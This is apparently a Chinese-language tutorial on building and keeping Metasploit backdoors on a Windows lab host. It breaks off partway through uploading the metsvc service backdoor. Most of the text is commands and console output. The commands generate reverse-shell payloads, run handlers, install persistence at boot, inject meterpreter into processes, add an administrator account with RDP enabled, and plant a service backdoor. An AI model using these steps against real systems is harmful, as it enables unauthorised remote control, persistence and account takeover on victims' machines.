|
Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试,shellcode 编写和漏洞研究提供了一个可靠平台。
这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了750多种流行的操作系统及应用软件的漏洞,以及N个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
同时他也提供了多种后门的方式,现在我们简单的了解他
msfpayload as shellcode
查看全部列表 目前有:248 蛋
1
|
root@Dis9Team:/home/brk# msfpayload -l
|
root@Dis9Team:/home/brk# msfpayload -l
他能生成多种多样的
简单的来说一个
正常的Windows后门
:用的是:windows/meterpreter/reverse_tcp
1
2
|
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
msfencode -b '' -t exe -o /var/www/meterpreter.exe
|
msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
msfencode -b '' -t exe -o /var/www/meterpreter.exe
生成以后让目标运行 我们需要进行监听,或者SHELL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit
[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800
meterpreter >
|
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit
[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800
meterpreter >
其他(php asp jsp dll)
选中你的msfpayload名字,生成,你动的 例如:
Dll:
参考: The DLL Hijacking Tutorial
php:
1
2
|
msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
|
msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
JAVA:
1
|
./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
|
./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
不正常的Windows后门
说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。
1
2
3
|
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
|
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
现在我们来运行他。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 1111
LPORT => 1111
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800
|
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf exploit(handler) > set LPORT 1111
LPORT => 1111
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800
成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
3 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) >
|
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
3 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) >
继续监听:
1
2
3
4
5
6
7
8
9
10
11
12
|
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
|
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
继续获得了SHELL
persistence
这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
msf exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter >
|
msf exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter >
下面我们来运行:
1
2
3
4
5
6
7
8
9
10
11
|
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >
|
meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >
安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
下面我们看看目标机子有什么情况:
多了几个VBS,这就是木马鸟,当我们重启或者登录的时候,他会自动运行,如何删除后么?
1
|
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
|
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
运行他
1
2
3
|
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
|
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
payload inject
射入其他payload。。 例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
|
msf exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf post(payload_inject) >
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false no Start an Exploit Multi Handler to receive the connection
LHOST 5.5.5.1 yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
msf post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf post(payload_inject) > set LPORT 9999
LPORT => 9999
msf post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf post(payload_inject) > set SESSION 5
SESSION => 5
msf post(payload_inject) > exploit
[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf post(payload_inject) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
4 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DIS9TEAM-A1 5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)
msf post(payload_inject) >
|
msf exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf post(payload_inject) >
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false no Start an Exploit Multi Handler to receive the connection
LHOST 5.5.5.1 yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
msf post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf post(payload_inject) > set LPORT 9999
LPORT => 9999
msf post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf post(payload_inject) > set SESSION 5
SESSION => 5
msf post(payload_inject) > exploit
[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf post(payload_inject) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
4 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DIS9TEAM-A1 5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)
msf post(payload_inject) >
TCP Shell Session
根据目标安装的脚本设置后门。。有auto, ruby, python, perl, bash,LINUX下也行
因为我啥子都木装 所以。。。 你动的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
msf post(system_session) > show options
Module options (post/multi/manage/system_session):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an Exploit Multi Handler to receive the connection
LHOST 5.5.5.1 yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)
msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
4 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DIS9TEAM-A1 5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)
msf post(system_session) > set SESSION 5
SESSION => 5
msf post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > exploit
[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) > set TYPE python
TYPE => python
msf post(system_session) > exploit
[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf post(system_session) > set LPORT 5555
LPORT => 5555
msf post(system_session) > exploit
[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) >
|
msf post(system_session) > show options
Module options (post/multi/manage/system_session):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an Exploit Multi Handler to receive the connection
LHOST 5.5.5.1 yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)
msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
4 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DIS9TEAM-A1 5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)
msf post(system_session) > set SESSION 5
SESSION => 5
msf post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > exploit
[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) > set TYPE python
TYPE => python
msf post(system_session) > exploit
[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf post(system_session) > set LPORT 5555
LPORT => 5555
msf post(system_session) > exploit
[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) >
pxexploit
看说明:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
没条件 所以不演示了
自动3389
很简单,进入模块设置帐号密码。 端口。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
msf post(enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE true no Enable the RDP Service and Firewall Exception.
FORDWARD false no Forward remote port 3389 to local Port.
LPORT 3389 no Local port to fordward remote connection.
PASSWORD no Password for the user created.
SESSION yes The session to run this module on.
USERNAME no The username of the user to create.
msf post(enable_rdp) > set USERNAME test
USERNAME => test
msf post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf post(enable_rdp) > set SESSION 5
SESSION => 5
msf post(enable_rdp) > exploit
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: test with Password: test
[*] Adding User: test to local group 'Remote Desktop Users'
[*] Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf post(enable_rdp) >
|
msf post(enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE true no Enable the RDP Service and Firewall Exception.
FORDWARD false no Forward remote port 3389 to local Port.
LPORT 3389 no Local port to fordward remote connection.
PASSWORD no Password for the user created.
SESSION yes The session to run this module on.
USERNAME no The username of the user to create.
msf post(enable_rdp) > set USERNAME test
USERNAME => test
msf post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf post(enable_rdp) > set SESSION 5
SESSION => 5
msf post(enable_rdp) > exploit
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: test with Password: test
[*] Adding User: test to local group 'Remote Desktop Users'
[*] Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf post(enable_rdp) >
看看3389开了木???
1
2
3
4
|
msf post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389
Connection to 5.5.5.3 3389 port [tcp/*] succeeded!
|
msf post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389
Connection to 5.5.5.3 3389 port [tcp/*] succeeded!
开了,你当然也能换其他端口
Inject in Memory
这货很牛B,内存射入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
msf post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf post(multi_meterpreter_inject) > exploit
[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
|
msf post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf post(multi_meterpreter_inject) > exploit
[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
成功获得了SHELL,
metsvc door
作为系统服务启动的
首先获得工具:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49-- http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”
100%[======================================>] 55,871 46.2K/s 花时 1.2s
2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])
brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive: metsvc-1.0.zip
creating: metsvc-1.0/
inflating: metsvc-1.0/ChangeLog.txt
inflating: metsvc-1.0/metsvc-server.exe
inflating: metsvc-1.0/metsvc.exe
inflating: metsvc-1.0/README.txt
creating: metsvc-1.0/src/
inflating: metsvc-1.0/src/Makefile
inflating: metsvc-1.0/src/metsvc-server.cpp
inflating: metsvc-1.0/src/metsvc.cpp
inflating: metsvc-1.0/src/metsvc.h
inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe meterpreter.php metsrv.x64.dll metsvc-server.exe
meterpreter.jar metsrv.dll metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt metsvc.exe README.txt test.rb
metsrv.dll metsvc-server.exe src
brk@Dis9Team:/tmp/metsvc-1.0$
|
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49-- http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”
100%[======================================>] 55,871 46.2K/s 花时 1.2s
2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])
brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive: metsvc-1.0.zip
creating: metsvc-1.0/
inflating: metsvc-1.0/ChangeLog.txt
inflating: metsvc-1.0/metsvc-server.exe
inflating: metsvc-1.0/metsvc.exe
inflating: metsvc-1.0/README.txt
creating: metsvc-1.0/src/
inflating: metsvc-1.0/src/Makefile
inflating: metsvc-1.0/src/metsvc-server.cpp
inflating: metsvc-1.0/src/metsvc.cpp
inflating: metsvc-1.0/src/metsvc.h
inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe meterpreter.php metsrv.x64.dll metsvc-server.exe
meterpreter.jar metsrv.dll metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt metsvc.exe README.txt test.rb
metsrv.dll metsvc-server.exe src
brk@Dis9Team:/tmp/metsvc-1.0$
然后上传:
1
2
3
4
5
6
7
8
9
10
|
meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
